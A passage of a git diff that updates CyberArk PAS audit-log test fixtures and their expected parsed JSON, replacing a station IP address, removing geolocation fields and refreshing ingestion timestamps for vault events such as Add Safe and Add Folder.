\u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:21\",\"IsoTimestamp\":\"2021-03-14T12:57:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMP_ADB_asr-cyberark-psm-ssh\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log index 93d8a45a00e..9ace149430f 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log @@ -1 +1 @@ -<5>1 2021-03-10T18:15:44Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:15:44","IsoTimestamp":"2021-03-10T18:15:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"181","Desc":"Update Safe","Severity":"Info","Issuer":"Administrator","Action":"Update Safe","SourceUser":"","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Safe","GatewayStation":""}}} +<5>1 2021-03-10T18:15:44Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:15:44","IsoTimestamp":"2021-03-10T18:15:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"181","Desc":"Update Safe","Severity":"Info","Issuer":"Administrator","Action":"Update Safe","SourceUser":"","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Safe","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log-expected.json index 3279b4d5942..42dd5c423c0 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -37,7 +25,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -46,7 +34,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T18:15:44Z", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Update Safe", "message": "Update Safe", "issuer": "Administrator", @@ -60,8 +48,8 @@ "event": { "severity": 2, "action": "update safe", - "ingested": "2021-06-09T10:24:28.899514900Z", - "original": "\u003c5\u003e1 2021-03-10T18:15:44Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:15:44\",\"IsoTimestamp\":\"2021-03-10T18:15:44Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"181\",\"Desc\":\"Update Safe\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Safe\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:39.071393700Z", + "original": "\u003c5\u003e1 2021-03-10T18:15:44Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:15:44\",\"IsoTimestamp\":\"2021-03-10T18:15:44Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"181\",\"Desc\":\"Update Safe\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Safe\",\"GatewayStation\":\"\"}}}", "code": "181", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log index 21a17a2c729..bfe809491fe 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log @@ -1,2 +1,2 @@ -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"Administrator","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}} -<5>1 2021-03-11T17:38:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 185\n Add Safe\n Info\n PSMPApp_VAGRANT\n Add Safe\n \n \n PSMRecordings\n \n 81.32.170.205\n \n \n \n \n \n Add Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"Administrator","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}} +<5>1 2021-03-11T17:38:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 185\n Add Safe\n Info\n PSMPApp_VAGRANT\n Add Safe\n \n \n PSMRecordings\n \n 67.43.156.13\n \n \n \n \n \n Add Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log-expected.json index 356f4927619..46671324d08 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -37,7 +25,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -46,7 +34,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Safe", "message": "Add Safe", "issuer": "Administrator", @@ -60,8 +48,8 @@ "event": { "severity": 2, "action": "add safe", - "ingested": "2021-06-09T10:24:28.925889300Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"185\",\"Desc\":\"Add Safe\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Safe\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:39.177420800Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"185\",\"Desc\":\"Add Safe\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Safe\",\"GatewayStation\":\"\"}}}", "code": "185", "kind": "event" } @@ -73,20 +61,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -103,7 +79,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -112,8 +88,8 @@ "rfc5424": true, "iso_timestamp": "2021-03-11T17:38:13Z", "safe": "PSMRecordings", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:13\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:13Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e185\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Safe\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eAdd Safe\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Safe\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:13\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:13Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e185\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Safe\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eAdd Safe\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Safe\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Add Safe", "message": "Add Safe", "issuer": "PSMPApp_VAGRANT", @@ -127,8 +103,8 @@ "event": { "severity": 2, "action": "add safe", - "ingested": "2021-06-09T10:24:28.925919900Z", - "original": "\u003c5\u003e1 2021-03-11T17:38:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e185\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Safe\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Safe\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Safe\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:13\",\"IsoTimestamp\":\"2021-03-11T17:38:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"185\",\"Desc\":\"Add Safe\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Add Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Safe\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:39.177430400Z", + "original": "\u003c5\u003e1 2021-03-11T17:38:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e185\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Safe\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Safe\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Safe\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:13\",\"IsoTimestamp\":\"2021-03-11T17:38:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"185\",\"Desc\":\"Add Safe\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Add Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Safe\",\"GatewayStation\":\"\"}}}", "code": "185", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log index 3f7fa511cc8..a9d4c8d1111 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log @@ -1,2 +1,2 @@ -<5>1 2021-03-10T09:11:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:40","IsoTimestamp":"2021-03-10T09:11:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"187","Desc":"Add Folder","Severity":"Info","Issuer":"Administrator","Action":"Add Folder","SourceUser":"","TargetUser":"","Safe":"PSMPADBridgeConf","File":"Root\\Scripts\\","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Folder","GatewayStation":""}}} +<5>1 2021-03-10T09:11:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:40","IsoTimestamp":"2021-03-10T09:11:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"187","Desc":"Add Folder","Severity":"Info","Issuer":"Administrator","Action":"Add Folder","SourceUser":"","TargetUser":"","Safe":"PSMPADBridgeConf","File":"Root\\Scripts\\","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Folder","GatewayStation":""}}} <5>1 2021-03-11T18:01:14Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:01:14\n 2021-03-11T18:01:14Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 187\n Add Folder\n Info\n PVWAAppUser\n Add Folder\n \n \n PSMUnmanagedSessionAccounts\n Root\\2\\\n 10.0.1.20\n \n \n \n \n \n Add Folder\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:01:14","IsoTimestamp":"2021-03-11T18:01:14Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"187","Desc":"Add Folder","Severity":"Info","Issuer":"PVWAAppUser","Action":"Add Folder","SourceUser":"","TargetUser":"","Safe":"PSMUnmanagedSessionAccounts","File":"Root\\2\\","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Folder","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log-expected.json index f4bc1be2354..2d423ba5584 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -40,7 +28,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -50,7 +38,7 @@ "iso_timestamp": "2021-03-10T09:11:40Z", "file": "Root\\Scripts\\", "safe": "PSMPADBridgeConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Folder", "message": "Add Folder", "issuer": "Administrator", @@ -64,8 +52,8 @@ "event": { "severity": 2, "action": "add folder", - "ingested": "2021-06-09T10:24:28.978084Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:40\",\"IsoTimestamp\":\"2021-03-10T09:11:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"187\",\"Desc\":\"Add Folder\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Folder\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBridgeConf\",\"File\":\"Root\\\\Scripts\\\\\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Folder\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:39.355913600Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:40\",\"IsoTimestamp\":\"2021-03-10T09:11:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"187\",\"Desc\":\"Add Folder\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Folder\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBridgeConf\",\"File\":\"Root\\\\Scripts\\\\\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Folder\",\"GatewayStation\":\"\"}}}", "code": "187", "kind": "event" } @@ -123,7 +111,7 @@ "event": { "severity": 2, "action": "add folder", - "ingested": "2021-06-09T10:24:28.978100500Z", + "ingested": "2021-12-09T13:36:39.355922200Z", "original": "\u003c5\u003e1 2021-03-11T18:01:14Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:01:14\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:01:14Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e187\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Folder\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePVWAAppUser\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Folder\u003c/Action\u003e\\n 